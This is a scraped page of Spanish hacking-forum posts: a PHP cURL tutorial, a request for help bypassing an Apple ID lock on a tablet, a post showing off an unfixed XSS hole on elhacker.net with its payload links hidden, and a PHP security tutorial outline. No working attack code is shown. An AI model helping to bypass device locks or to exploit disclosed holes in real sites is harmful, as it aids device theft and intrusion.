Como ves es demasiado facil, y de hecho ya existen muchos paquetes que te incluyen un servidor apache,mysql,php tal como puede ser XAMPP, AppServ... los cuales pueden descagar desde su web oficial y son faciles de instalar y casi siempre ya traen soporte para cURL:

XAMPP: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
AppServ: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para saber si nuestro servidor soporta cURL solamente creamos un archivo como el siguiente info.php:

1<?php phpinfo(); ?>
Entramos al archivo y veremos algo como lo siguiente:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  ¿Que es cURL? cURL es una herramienta para usar en un interprete de comandos para transferir archivos con sintaxis URL, soporta FTP, FTPS, HTTP, HTTPS, TFTP, SCP, Telnet, DICT, FILE, y LDAP. cURL soporta certificados HTTPS,HTTP POST, HTTP PUT,Subidas FTP, Kerberos, Subidas mediante formulario HTTP, proxies, cookies, autenticacion mediante usuario+contraseña (Basic, Digest, NTLM y Negotiate para HTTP y Kerberos4 para FTP), continuacion de transferencia de archivos, tunneling de proxy http y muchas otras prestaciones. cURL es opensource/software libre distribuido bajo la licencia MIT. El proposito y uso para cURL es automatizar transferencia de archivos o secuencia de operaciones no supervisadas. Es por ejemplo una buena herramienta para simular las acciones de un usuario en un navegador web. Libcurl es la biblioteca/API correspondiente que los usuarios pueden incorporar en sus programas, cURL actua como un envoltorio (wrapper) aislado para la biblioteca libcurl. libcurl se usa para proveer capacidades de transferencia de URL a numerosas aplicaciones, tanto libres y open source como asi tambien privativas. La biblioteca "libcurl" se puede usar desde mas de 30 lenguajes distintos.


  HTTP Hypertext transfer protocol o http (en español protocolo de transferencia de hipertexto) es el protocolo usado en cada transaccion de la world wide web. Es un protocolo orientado a transacciones y sigue el esquema peticion-respuesta entre cliente y un servidor. Al cliente que efectua la peticion (un navegador o un spider) se conoce como "user-agent" (agente del usuario). A la informacion transmitida se le llama recurso y se la identifica mediante un localizador uniforme de recursos (URL). Los recursos pueden ser archivos, el resultado de la ejecucion de un programa, una consulta a una base de datos,la traduccion automatica de un documento, etc. HTTP es un protocolo sin estado, es decir, no guarda ninguna informacion sobre conexiones anteriores. El desarrollo de aplicaciones web necesita frecuentemente mantener el estado. Para eso se usan las cookies, que es informacion que un servidor puede almacenar en el sistema cliente. Esto permite a las aplicaciones web instruir la nocion de "sesion", y tambien permite rastrear usuarios ya que las cookies pueden guardarse en el cliente por tiempo indeterminado.
 
  Uso simple de cURL La operacion mas comun es obtener una URL. Podriamos hacer referencia a una pagina, imagen o archivo. El cliente hace una peticion GET y recibe el documento que pidio.
  curl_init() - esta funcion inicializa una sesion cURL y retorna un manejador cURL.
  curl_exec($ch) -  esta funcion deberia ser llamada despues de inicializar una sesion cURL y todas las opciones establecidas en la sesion. Su proposito es simple, ejecutar la sesion CURL predefinida, dada por $ch.
  curl_setopt($ch, opcion, valor) - establece una opcion para la sesion de CURL identificada por el parametro $ch, opcion especifica la opcion que se desea establecer, y valor especifica el valor dada la opcion.
  curl_setopt($ch,CURLOPT_RETURNTRANSFER,1) - Retorna el contenido de la pagina. Si se establece en 0 no se retornara ninguna salida.
 
curl_setopt($ch,CURLOPT_URL, $url) - Pasa la url como parametro. Este el el sitio objetivo la direccion url. Esta es la url que vas a obtener desde internet.

  curl_exec($ch) - Graba la url y la pasa para la variable a mostrar.

curl_close($ch) -  cierra un recurso curl, libera los recursos del sistema.


01<?php
02 // Ejemplo 1
03 // Obtener una pagina simple
04
05 $url = "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta";
06 $ch = curl_init();
07 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  // Retorna el contenido de la pagina
08 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // sigue las redirecciones
09 curl_setopt($ch, CURLOPT_URL, $url); // Pasa la url como parametro
10 $resultado = curl_exec($ch); // graba la url y la pasa para una variable
11 curl_close($ch); // cierra el recurso y libera recursos para el sistema
12
13 echo $resultado; // Imprime el contenido de la pagina
14?>

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#37
Hola underc0de, me preguntaba si alguien sabe como desbloquear una table que pide id y pass de apple y luego dice algo de para recuperar tal tal un email y***@sdsdhsd.com  y viene el numero de celular... me gustaria saber si alguien tiene idea de como desbloquearlo?

saludos y gracias de antemano :3
#38
Hacking ShowOff / [XSS] elhacker.net
Junio 12, 2014, 12:50:05 AM




Ya les avise pero no lo han corregido, saludos xD

Payloads:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#39
Bueno para no andar posteando lo puse en un pdf, cualquiera lo puede ver online o bajarlo, les dejo el link:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#40
Back-end / [Parte 1] Seguridad en PHP
Febrero 24, 2014, 05:15:02 PM


Buenas!, hoy les traigo la primera parte de los tutoriales que ire posteando esta parte tiene el siguiente contenido:

* Register globals (eliminado en la versiones mas nuevas pero no por eso no se hablara de el)
* Reporte de errores
* Principios
- Defensa en profundidad
- Privilegio minimo
- Lo simple es bello
- Minimizar la exposicion
* Practicas
- Riesgos de balance y usabilidad
- Seguimiento de datos
- Filtrar las entradas
- Filtrar las salidas
* Referencias

Sin nada mas que decir espero que les guste, aca les dejo el link:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta